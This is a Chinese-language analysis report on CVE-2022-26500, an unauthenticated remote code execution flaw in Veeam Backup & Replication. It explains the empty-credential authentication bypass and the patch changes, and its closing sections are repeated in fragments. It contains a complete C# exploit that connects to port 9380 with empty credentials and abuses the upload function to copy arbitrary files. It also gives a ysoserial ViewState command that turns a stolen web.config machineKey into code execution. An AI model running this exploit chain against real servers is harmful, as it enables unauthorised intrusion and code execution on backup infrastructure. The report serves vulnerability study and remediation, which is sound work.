Veeam Backup & Replication RCE漏洞(CVE-2022-26500)分析报告<\/h1>

漏洞概述<\/h2>
CVE-2022-26500是Veeam Backup & Replication软件中的一个远程代码执行漏洞，影响默认TCP 9380端口上的Veeam Distribution Service。该漏洞允许未经身份验证的攻击者访问内部API函数，可能导致恶意代码的上传和执行。<\/p>

受影响版本<\/h2>

Veeam Backup & Replication 11.0.1.1261及之前版本<\/li> <\/ul>

漏洞分析<\/h2>

漏洞服务定位<\/h3>

漏洞存在于默认TCP 9380端口的Veeam Distribution Service<\/li>
相关程序：Veeam.Backup.Agent.ConfigurationService.exe<\/code><\/li>

服务启动时监听两个端口：

_negotiateServer<\/code>监听9380（未加密）<\/li>
_sslServer<\/code>监听9381（SSL加密）<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞关键点<\/h3>


鉴权绕过<\/strong>：<\/p>

处理函数为Veeam.Backup.ServiceLib.CInvokerServer.HandleTcpRequest(object)<\/code><\/li>
鉴权函数CForeignInvokerNegotiateAuthenticator.Authenticate(Socket)<\/code>存在缺陷<\/li>
可使用空账号密码绕过鉴权<\/li>
<\/ul>
<\/li>

请求处理流程<\/strong>：<\/p>

TCP压缩数据流通过ReadCompressedString<\/code>读取<\/li>
通过CForeignInvokerParams.GetContext(text)<\/code>获取上下文<\/li>
分发到DoExecute(context, cconnectionState)<\/code><\/li>
<\/ul>
<\/li>

执行器选择<\/strong>：<\/p>

根据参数返回三种执行器之一：

CInvokerServerRetryExecuter<\/code>（重试）<\/li>
CInvokerServerAsyncExecuter<\/code>（异步）<\/li>
CInvokerServerSyncExecuter<\/code>（同步）<\/li>
<\/ul>
<\/li>
漏洞利用需要获取CInvokerServerSyncExecuter<\/code>实例<\/li>
<\/ul>
<\/li>

文件上传功能<\/strong>：<\/p>

关键函数ExecuteUploadManagerPerformUpload<\/code><\/li>
三个上传函数：

UploadWindowsFix<\/code><\/li>
UploadWindowsPackage<\/code><\/li>
UploadLinuxPackage<\/code><\/li>
<\/ul>
<\/li>
通过UploadFile<\/code>函数实现文件复制<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
构造Payload<\/h3>


基本XML结构<\/strong>：<\/p>
CInputXmlData FIData = new<\/span> CInputXmlData("FIData"<\/span>);
<\/span><\/span>CInputXmlData FISpec = new<\/span> CInputXmlData("FISpec"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

必要字段<\/strong>：<\/p>
FISpec.SetInt32("FIScope"<\/span>, 190<\/span>);  \/\/ EForeignInvokerScope.DistributionService<\/span>
<\/span><\/span>FISpec.SetGuid("FISessionId"<\/span>, Guid.Empty);
<\/span><\/span>FISpec.SetInt32("FIMethod"<\/span>, (int<\/span>)EConfigurationServiceMethod.UploadManagerPerformUpload);
<\/span><\/span><\/code><\/pre><\/li>

上传参数设置<\/strong>：<\/p>
FISpec.SetString("SystemType"<\/span>, "WIN"<\/span>);
<\/span><\/span>FISpec.SetString("Host"<\/span>, "127.0.0.1"<\/span>);
<\/span><\/span>FISpec.SetString("FileRemotePath"<\/span>, @"C:\windows\test.txt"<\/span>);
<\/span><\/span>FISpec.SetString("FileProxyPath"<\/span>, @"C:\windows\win.ini"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
完整利用代码<\/h3>
internal<\/span> class<\/span> Program<\/span> {
<\/span><\/span>    static<\/span> TcpClient client = null<\/span>;
<\/span><\/span>    static<\/span> void<\/span> Main(string<\/span>[] args) {
<\/span><\/span>        IPAddress ipAddress = IPAddress.Parse("172.16.16.76"<\/span>);
<\/span><\/span>        IPEndPoint remoteEP = new<\/span> IPEndPoint(ipAddress, 9380<\/span>);
<\/span><\/span>        client = new<\/span> TcpClient();
<\/span><\/span>        client.Connect(remoteEP);
<\/span><\/span>        
<\/span><\/span>        NetworkStream clientStream = client.GetStream();
<\/span><\/span>        NegotiateStream authStream = new<\/span> NegotiateStream(clientStream, false<\/span>);
<\/span><\/span>        
<\/span><\/span>        try<\/span> {
<\/span><\/span>            NetworkCredential netcred = new<\/span> NetworkCredential(""<\/span>, ""<\/span>);
<\/span><\/span>            authStream.AuthenticateAsClient(netcred, ""<\/span>, ProtectionLevel.EncryptAndSign, TokenImpersonationLevel.Identification);
<\/span><\/span>            
<\/span><\/span>            CInputXmlData FIData = new<\/span> CInputXmlData("FIData"<\/span>);
<\/span><\/span>            CInputXmlData FISpec = new<\/span> CInputXmlData("FISpec"<\/span>);
<\/span><\/span>            
<\/span><\/span>            FISpec.SetInt32("FIScope"<\/span>, 190<\/span>);
<\/span><\/span>            FISpec.SetGuid("FISessionId"<\/span>, Guid.Empty);
<\/span><\/span>            FISpec.SetInt32("FIMethod"<\/span>, (int<\/span>)EConfigurationServiceMethod.UploadManagerPerformUpload);
<\/span><\/span>            
<\/span><\/span>            \/\/ 设置上传参数<\/span>
<\/span><\/span>            FISpec.SetString("SystemType"<\/span>, "WIN"<\/span>);
<\/span><\/span>            FISpec.SetString("Host"<\/span>, "127.0.0.1"<\/span>);
<\/span><\/span>            FISpec.SetString("FileRemotePath"<\/span>, @"C:\windows\test.txt"<\/span>);
<\/span><\/span>            FISpec.SetString("FileProxyPath"<\/span>, @"C:\windows\win.ini"<\/span>);
<\/span><\/span>            
<\/span><\/span>            FIData.InjectChild(FISpec);
<\/span><\/span>            
<\/span><\/span>            new<\/span> BinaryWriter(authStream).WriteCompressedString(FIData.Root.OuterXml, Encoding.UTF8);
<\/span><\/span>            string<\/span> response = new<\/span> BinaryReader(authStream).ReadCompressedString(int<\/span>.MaxValue, Encoding.UTF8);
<\/span><\/span>            
<\/span><\/span>        } catch<\/span> (Exception e) {
<\/span><\/span>            Console.WriteLine(e);
<\/span><\/span>        } finally<\/span> {
<\/span><\/span>            authStream.Close();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>提权到RCE<\/h3>


获取web.config<\/strong>：<\/p>

复制C:\Program Files\Veeam\Backup and Replication\Enterprise Manager\WebApp\web.config<\/code><\/li>
从中提取machineKey等敏感信息<\/li>
<\/ul>
<\/li>

ViewState反序列化<\/strong>：<\/p>
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc"<\/span> --validationkey=<\/span>"[从web.config获取]"<\/span> --validationalg=<\/span>"HMACSHA256"<\/span> --minify --path=<\/span>"\/error.aspx"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复<\/h2>


补丁改进<\/strong>：<\/p>

上传功能增加了文件名校验<\/li>
授权改用CInvokerAdminNegotiateAuthenticator<\/code><\/li>
不仅检查授权用户，还验证是否为管理员<\/li>
<\/ul>
<\/li>

修复建议<\/strong>：<\/p>

立即升级到最新版本<\/li>
限制对TCP 9380端口的访问<\/li>
<\/ul>
<\/li>
<\/ol>
技术要点总结<\/h2>


TCP编程模式<\/strong>：<\/p>

服务端常见的异步回调处理模式<\/li>
压缩数据流传输<\/li>
<\/ul>
<\/li>

Windows鉴权机制<\/strong>：<\/p>

NegotiateStream的使用<\/li>
鉴权流程的缺陷<\/li>
<\/ul>
<\/li>

大型软件架构<\/strong>：<\/p>

执行器模式的应用<\/li>
分层处理的设计<\/li>
<\/ul>
<\/li>

漏洞利用技巧<\/strong>：<\/p>

通过文件复制实现信息泄露<\/li>
利用已有文件实现RCE<\/li>
<\/ul>
<\/li>
<\/ol>
潜在风险<\/h2>
即使修复了鉴权问题，CInvokerServerSyncExecuter<\/code>仍然暴露了许多服务接口，可能存在其他未发现的漏洞。建议全面审计相关代码。<\/p>

Veeam Backup & Replication RCE漏洞(CVE-2022-26500)分析报告<\/h1>

漏洞概述<\/h2> CVE-2022-26500是Veeam Backup & Replication软件中的一个远程代码执行漏洞，影响默认TCP 9380端口上的Veeam Distribution Service。该漏洞允许未经身份验证的攻击者访问内部API函数，可能导致恶意代码的上传和执行。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

潜在风险<\/h2> 即使修复了鉴权问题，CInvokerServerSyncExecuter<\/code>仍然暴露了许多服务接口，可能存在其他未发现的漏洞。建议全面审计相关代码。<\/p>

漏洞概述<\/h2>
CVE-2022-26500是Veeam Backup & Replication软件中的一个远程代码执行漏洞，影响默认TCP 9380端口上的Veeam Distribution Service。该漏洞允许未经身份验证的攻击者访问内部API函数，可能导致恶意代码的上传和执行。<\/p>

潜在风险<\/h2>
即使修复了鉴权问题，`CInvokerServerSyncExecuter<\/code>仍然暴露了许多服务接口，可能存在其他未发现的漏洞。建议全面审计相关代码。<\/p>`